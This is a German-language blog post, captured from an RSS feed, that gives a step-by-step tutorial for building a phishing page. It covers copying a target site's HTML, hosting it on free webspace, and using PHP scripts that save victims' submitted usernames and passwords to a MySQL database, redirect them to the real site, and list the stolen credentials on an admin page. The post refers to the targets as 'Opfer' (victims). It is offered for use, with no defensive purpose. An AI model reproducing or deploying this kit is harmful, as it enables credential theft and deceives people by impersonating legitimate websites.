Daniel Schröter's Blog » fishing page http://blog.danielschroeter.de blog.danielschroeter.de Wed, 16 Nov 2011 11:07:35 +0000 en hourly 1 How to create a Fishing-Page (MySQL) http://blog.danielschroeter.de/coding/how-to-create-a-fishing-page-mysql/ http://blog.danielschroeter.de/coding/how-to-create-a-fishing-page-mysql/#comments Sat, 07 Jun 2008 16:47:10 +0000 Daniel http://www.danielschroeter.de/blog/?p=172 Queltext anzeigen -> und den Inhalt in eine .html-file abspeichern. 2. Nun haben wir ein Abbild von der Page 3. Bei einem beliebigen Free-Webspace Anbieter anmelden der zusätzlich noch eine SQL-Datenbank anbietet. Erstellt nun folgende Dateien mit dem darunterliegendem Inhalt: [...]]]> 1. Source code von der Webseite nehmen, welcher an euren Browser geschickt wurde. (Rechtsklick -> Queltext anzeigen -> und den Inhalt in eine .html-file abspeichern.
2. Nun haben wir ein Abbild von der Page :)
3. Bei einem beliebigen Free-Webspace Anbieter anmelden der zusätzlich noch eine SQL-Datenbank anbietet.

Erstellt nun folgende Dateien mit dem darunterliegendem Inhalt:

index.html

das ist der Source der kopierten Seite.

send.php

?View Code PHP
1
2
3
4
5
6
7
8
9
10

< ?php
include ("sqlconnect.php");
$username = $_POST["username"];
$userpasswort = $_POST["passwort"];
$eintrag = "INSERT INTO base (user, pwd) VALUES ('$username', '$userpasswort')";
$eintragen = mysql_query($eintrag);
?>
<meta http-equiv="refresh" content="0; URL=http://blablub.com">
 
</meta>

Ihr ersetzt “http://blablub.com” mit der Seite des “Opfers” (nachdem die Daten abgeschickt wurden). Dort wird er Quasi nach erfolgreicher Eingabe umgeleitet.

sqlconnect.php

?View Code PHP
1
2
3
4
5
6
7
8

< ?php
$server = "localhost";
$user = "root";
$pwd = "password";
$database = "data";
mysql_connect("$server","$user","$pwd") or die ("Keine Verbindung moeglich");
mysql_select_db("$database") or die ("Die Datenbank existiert nicht");
?>

“localhost” wird mit dem MySQL-Datenbankserver ersetzt, diesen bekommt ihr von eurem Free-Webspace Anbieter.
“root” wird mit dem MySQL-Benutzernamen ersetzt. (Gibts auch von Anbieter…)
“password” wird mit dem MySQL-Password ersetzt….
“data” ist mit dem Datenbanknamen zu überschreiben… (Ebenfalls Webspaceanbieter)

make.php

?View Code PHP
1
2
3
4
5
6
7
8
9
10

< ?php
include ("sqlconnect.php");
$sql = 'CREATE TABLE `base` ('
. ' `user` VARCHAR(255) NOT NULL, '
. ' `pwd` VARCHAR(255) NOT NULL'
. ' )'
. ' ENGINE = myisam;';
$eintragen = mysql_query($sql);
echo "Tabelle erstellt! Diese Datei kann nun gelöscht werden. (make.php)";
?>

admin.php

?View Code PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

< ?php
include ("sqlconnect.php");
$ident = $_POST["pw"];
if (isset($ident))
{
if ($ident=="deinpw")
{
 
$abfrage = "SELECT * FROM base";
$ergebnis = mysql_query($abfrage);
while($row = mysql_fetch_object($ergebnis))
{
echo "ID: $row->user";
echo "&nbsp;&nbsp;&nbsp;";
echo "PW: $row->pwd";
echo "<br />";
}
}
else
{
echo "Passwort falsch! Probiers nochmal...";
}
}
else
{
echo "<form action=\"admin.php\" method=\"post\">";
echo "<input type=\"text\" name=\"pw\" size=\"21\" value=\"pw eingeben\" maxlength=\"50\"/>";
echo "</form>";
}
?>

anstatt “deinpw” gebt ihr ein belibiges Passwort ein.

Als nächstes ladet ihr die 5 Dateien auf eurem Webspace hoch und führt die “make.php” im Browser aus. Eure Seite könnt ihr über die index.html aufrufen. Die eingetragenen Daten des “Opfers” sind in der admin.php zu finden…

Folgende Files müssten dann auf eurem Webspace zu finden sein wenn ihr alles richtig gemacht habt.

index.html
send.php
sqlconnect.php
make.php
admin.php

]]> http://blog.danielschroeter.de/coding/how-to-create-a-fishing-page-mysql/feed/ 0